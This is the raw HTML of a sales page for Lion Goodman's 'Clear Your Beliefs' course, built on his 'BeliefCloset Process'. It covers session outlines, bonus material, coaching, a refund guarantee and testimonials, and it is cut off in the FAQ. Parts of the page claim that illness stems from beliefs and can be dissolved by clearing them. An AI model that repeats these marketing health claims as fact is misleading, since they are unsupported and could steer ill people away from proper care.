href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px;margin-bottom: 5px" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.</p>\n<p>The belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a "download" – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.</p>\n<p>When your closet is crammed full of old outfits you''ll never wear, it''s time for some Spring cleaning!</p>\n<p><em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong></p>\n<p>Having worked with thousands of clients over the past decade, I''ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I''ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven''t touched.</p>\n<p>I am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.</p>\n<p>If you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.</p>\n<p>A lot of people say, "just change your beliefs..." as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.</p>\n<p>In the <em>Clear Your Beliefs</em> course, you''ll get guidance from me, through a series of recorded classes. If you''re registering as a part of a Clear Your Beliefs Coaching package, you''ll work with your professional <em>Clear Your Beliefs Coach </em>in private sessions to follow up on your work with each recording.  You''ll experience seven sessions of deep healing and transformation, then go deeper with your coach each week. Clear your old beliefs, and create the life you want.</p>\n<p>This is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.</p>\n<p>Live the life of your dreams. There''s nothing to stop you – except a few old beliefs...</p>\n<p>In gratitude, and with warm wishes for your total success,</p>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490 no-shad" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a></p>\n<p>Lion Goodman, Creator of <em>The BeliefCloset Process</em></p>\n\n<p>&nbsp;</p>\n<h1>Register Today and Discover What''s Possible</h1>\n\n<p>We are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience, and if you''ve registered for a coaching package, you''ll go deeper each week with your coach. You''ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful methodology used by hundreds of coaches and therapists around the world.</p>\n\n<p>&nbsp;</p>\n\n<h5>Session 1:   <strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.</p>\n<p>In this first session, you''ll examine your old beliefs, and determine which ones no longer serve you.  It''s time to discard them and clear some space!  You''ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades.  You''ll feel more open, empowered and free to choose your beliefs and the way you live your life.</p>\n\n<p><strong> In Session 1, you will:</strong></p>\n\nDiscover old limiting beliefs that are deeply buried in your subconscious mind\nLearn which ones keep you stuck, preventing you from having what you want in life\nExperience a process that returns you to your True Self, the home of inner joy and bliss\nBegin to work with, not against, your subconscious mind – where your beliefs reside\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 2:   <strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you''ll focus on issues and problems that have kept you from being happy and joyful.</p>\n<p>What do you believe about yourself? Your idea of "Who I am" is based on beliefs and programming you got as a child.  What messages did your parents, caregivers, and siblings plant in your child brain that still affect you? In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.  It''s time to haul them out, and toss them out! You don''t need them anymore.  If you hear critical inner voices berating you, don''t miss this session.  Rid yourself of those pesky critical voices along with the diapers!</p>\n\n<p><strong> In Session 2, you will:</strong></p>\n\nUse the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself\nClear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again\nSee your own magnificence through a new clear lens of your own beauty and joy\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 3:  <strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.</p>\n<p>This isn''t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.</p>\n<p><em>What are you capable of?  </em>If your answer is "Anything..." you don''t need this session.  But most of us think too small...</p>\n\n<p>Our <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised.  We let our negative beliefs stop us. You may hear internal voices say, <em>"What''s the use?  You''ll fail anyway. You don''t deserve happiness – look at you!"  </em>We were shamed into thinking that we were less than others.We learned to compare ourselves to others – and we always lose that contest.  Clear out any apparent limitations you''ve taken on, and find your true power to create what you want.  Do whatever you need to do in order to achieve your vision.</p>\n\nDo you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you''ll eliminate those beliefs and relieve yourself of those symptoms. You''re already a master manifestor – you''re just manifesting your old programs!\n\n<p><strong> In Session 3, you will:</strong></p>\n\nIdentify old beliefs that stand between you and creating the life you want\nDissolve the old beliefs that get in your way over and over, or make you quit when you''re partway there.\nImagine what it means to live without self-imposed limitations, trusting that you can create anything you want\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 4:   <strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you''ll delete beliefs that interfere with your personal relationships.</p>\n<p>If you''re married, are you happy and secure?   Or are you anxious about the future?   If you''re not in a relationship, what''s holding you back from finding your ideal mate?</p>\n<p>Humans are social creatures – we must relate to others to survive.  At our core, we want a security and safety, but we also want passion and romance.  You learned "what love is" from your parents – so it''s no wonder that you''re confused!  Most of us repeat patterns we learned from our early childhood.  We watched our parents interact, and Mom and Dad''s relationship became our model of what a relationship is supposed to look like.  In your family, love may have been  contaminated by disdain, contempt, withdrawal, or abuse.  We were programmed to repeat their patterns – without conscious choice.  This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.</p>\n\n<p>&nbsp;</p>\n\n<p><strong> In Session 4, you will:</strong></p>\n\nLook deeply into the childhood patterns that enabled you to survive and thrive\nSee which of your beliefs now interfere with your intimate relationships\nDiscover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 5:   <strong>Clear Your Old Beliefs About Money and Work</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you''ll focus on money, wealth and abundance – or the lack thereof!</p>\n<p>What do you believe about earning a living in today''s economy?   Is money really the root of all evil?</p>\n<p>If you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem.   Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture.   Can you see their influence?</p>\n\n<p><strong> In Session 5, you will:</strong></p>\n\nExamine your family and cultural beliefs about money, work, poverty and "deservingness."\nRemove beliefs that create stumbling blocks in the way of natural abundance\nCreate new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve\nLearn why affirmations alone, and the "Law of Attraction," don''t work, regardless of how diligently you practice them\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 6:   <strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you''ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.</p>\n<p>Ill health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.  What do you believe and perceive about your body?   Your health?  Your age?  Your vitality?  Your ability to heal?  The future of your health?</p>\n\n<p><strong> In Session 6, you will:</strong></p>\n\nIdentify old beliefs that stand between you and vibrant health\nRecognize beliefs that make you vulnerable to disease and injury\nDissolve old beliefs at the root of illness, bad habits and lifestyle stress\nImagine the healthy, vibrant body you want, and create it consciously with new beliefs\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 7:   <strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you''ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.</p>\n<p>You''ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.</p>\n<p>When you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you''ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.</p>\n\n<p><strong> In Session 7, you will:</strong></p>\n\nScan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live\nLearn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life\nFind your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are\n\n<p></p>\n<p>&nbsp;</p>\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\n<p>In addition to these seven transformational sessions, you''ll also receive these awesome bonus interviews and gifts.  These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.</p>\n<p>&nbsp;</p>\n\nBonus #1:  <strong>Love:  What Makes It So Confusing?\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3.jpg"><img class="alignleft  wp-image-1053" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3-232x300.jpg" alt="Carista Portrait 3" width="161" height="209" /></a>We all want more love in our life, but something keeps getting in the way.  We can''t seem to stop hurting each other. What''s going on?</p>\n<p>Lion interviews Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, President of Luminary Leadership Institute, and co-creator of <em>Confused About Love? </em> and <em>The Power of Love</em> program.  (She is also known as <em>Lion''s fiance''</em>)</p>\n<p>Carista shares the latest research on how our early bonding patterns with our parents play out repeatedly in our adult relationships.  We''re confused about what love is, and how to love.  The answers are in our neurology, our earliest programming, and our beliefs about love and how to get it.</p>\n<p>Learn how to determine your own (and your partner''s) LoveStyle, using the <em>LoveStyle Profile Quiz </em>(Bonus # 2).  You''ll also get some practical tips for healing old wounds and bringing passion and security back into your relationship.\n<strong>\nCarista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute.  She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, and organizations.  Her comprehensive, holistic parenting methodology is described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em>  In partnership with Lion, she developed LLI''s leading-edge evolutionary leadership program.   After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.</p>\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\nBonus #2 <strong>- The LoveStyle Profile Quiz </strong>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships. Developed by Carista Luminare and Lion Goodman, you''ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and shows you where you are on each spectrum.</p>\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\nBonus #3: <strong> The Spiritual Technology of Manifesting\nGuest Faculty: Anodea Judith, Ph.D. </strong>\n\n<p><img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" />Why don''t affirmations and the Law of Attraction work?  You''ll learn why in this interview with internationally acclaimed author and teacher Anodea Judith, one of the world''s leading experts on the Chakras.  Her books have sold more than 500,000 copies worldwide.</p>\n\n<p>Lion and Anodea discuss the principles of Manifestation outlined in their book, <em>Creating On Purpose: The Spiritual Technology of Manifesting Through the Chakras.  </em>Beliefs are at the core of the manifestation process, and<em> t</em>heir book is a step-by-step manual for turning any dream into a reality by taking a single idea down through the chakras and into the real world.  You''ll receive the first two chapters of the book as Bonus #4, below.</p>\n\n<p>Anodea Judith, Ph.D. is the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>.  She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world.  Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.</p>\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\nBonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong>\n\n<p><strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:</p>\n\nBe called to awaken your already-powerful ability to create the life of your dreams\nLearn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)\nUnderstand the 7 chakras as stepping stones along the path of the manifestation process\nGain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life\nLearn a process that can strengthen your power of intention\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\nBonus #5:<strong> Change Your Beliefs eBook</strong>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png"><img class=" wp-image-433 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png" alt="TYB Cover" width="159" height="206" /></a></p>\n\n<p>You''ll also receive a copy of Lion''s multimedia eBook, "<em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>" </p>\n<p>Lion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why you do what you do, and why it''s so difficult to change your habitual patterns of thought and behavior. </p>\n<p>It''s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.</p>\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\nBonus #6: <strong>Complete Transcripts of the Course</strong>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding.jpg"><img class="alignleft  wp-image-985" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding-300x199.jpg" alt="ReportsLanding" width="148" height="98" /></a>You''ll also receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!</p>\n\n<p>&nbsp;</p>\n<h1 id="bonus">Your Professional Coaching Sessions</h1>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="195" height="165" /></a>If you''re registering as part of a Clear Your Beliefs Coaching program, you''ll work with your <em>Clear Your Beliefs Coach</em> weekly. He or she will accompany you on your journey and guide you, step-by-step, through the process.</p>\n<p><em>Clear Your Beliefs Coaches</em> have been trained to help you deal with almost any issue, regardless of how long it''s been interfering with your life. Your coach will safely guide you down to the deepest levels of your psyche – which can be difficult to get to all by yourself – yet it''s where the most powerful changes occur.  He or she will meet with you by phone (or Skype) each week, on a day that fits your schedule, at a time that''s convenient for you.</p>\n<p>Your coach will guide you through any difficult inner terrain you might encounter, and help you identify and delete difficult-to-locate core beliefs.</p>\n<p><strong>[Note: Our coaches help you change your own beliefs and reduce or eliminate the impact they''ve had on your life. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis.]</strong></p>\n<h1 id="package"></h1>\n<p style="text-align: right"><a href="http://clearyourbeliefs.com/program/#top">Up To Top</a></p>\n<p>&nbsp;</p>\n\n<h1>Purchase Today and You''ll Receive:</h1>\n<p><strong>Seven 90-Minute Class Sessions</strong> – Learn one of the world''s most powerful belief-change technologies, from the comfort of your own home. Each class session gives you the skill to easily change your beliefs – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. Listen online, or download high-quality MP3s and listen anytime.</p>\n<h3 style="font-size: 20px">Plus: <em>The Entire BONUS Collection:</em></h3>\n\n<strong><em>What Makes Love So Confusing?</em> </strong>– Audio interview featuring Carista Luminare, Ph.D.\n<em><strong>The Spiritual Technology of Manifesting</strong></em> – Audio interview featuring Anodea Judith, Ph.D.\nYour Childhood Bonding Pattern Assessment: <strong><em>The LoveStyle Profile Quiz</em></strong>\n<strong><em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em></strong> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)\nMultimedia eBook: <strong><em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em></strong> by Lion Goodman (PDF)\n<strong>A complete set of PDF Transcripts</strong> of all seven classes plus two bonus calls.\n<strong>Optional:</strong> Professional Coaching Sessions.\n\n<p>&nbsp;</p>\n\n<p>&nbsp;</p>\n<p><a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank">Register Now</a></p>\n<p style="text-align: center">OR</p>\n<p><a href="http://clearyourbeliefs.com/free-ebook" target="_blank">Free eBook</a></p>\n\n<p>&nbsp;</p>\n\n<h1>Satisfaction Guaranteed</h1>\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don''t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we''ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)</p>\n<p>&nbsp;</p>\n<h1>About Lion Goodman</h1>\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.</p>\n<p>He is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em></p>\n<p>He is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em></p>\n<p>Lion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men''s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men''s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.</p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n\n<h1>Praise for Lion and Clear Your Beliefs</h1>\n\n<p><em>"You helped me resolve in a short time issues in my life that I''ve struggled with for years. In addition, I can use the tools you''ve taught me to deal with any difficult circumstance that may appear in the future."</em></p>\n<strong>– G. J., software developer</strong>\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you''ll grow to love him, as I do."</em></p>\n<strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day."</em></p>\n<strong>~ Jamee Tenzer, Life Coaching for Working Women</strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"Thank you taking me back to the beginning to help me hit the "reset" button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. "</em></p>\n<strong>~ S.K., Life Coach, Ontario, Canada </strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ''belief-outfits'' are perfect for me, and I''m wearing them with joy and enthusiasm!"</em></p>\n<strong>~ D. T., Physical Therapist, Denver, CO </strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs."</em></p>\n<strong> ~ T. S., Business Owner, Yukon, Canada</strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before."</em></p>\n<strong>~ T. L., Healer, Stamford, CT </strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process."</em></p>\n<strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth."</em></p>\n<strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"I uncovered beliefs I didn''t know I had, including: "I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God." It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em></p>\n<strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"This valuable tool will enhance your life in ways you cannot imagine. It''s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding."</em></p>\n<strong>~ C.T., Performance and Life Coach</strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them."</em></p>\n<strong>– M.M., International Business Consultant</strong>\n\n<p>&nbsp;</p>\n\n<p>&nbsp;</p>\n<p><a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank">Register Now</a></p>\n<p style="text-align: center">OR</p>\n<p><a href="http://clearyourbeliefs.com/free-ebook" target="_blank">Free eBook</a></p>\n\n<p>&nbsp;</p>\n<h1>Satisfaction Guaranteed</h1>\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don''t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we''ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)</p>\n<p>&nbsp;</p>\n<h1>Frequently Asked Questions</h1>\n\n<p><strong>Q: What is a virtual 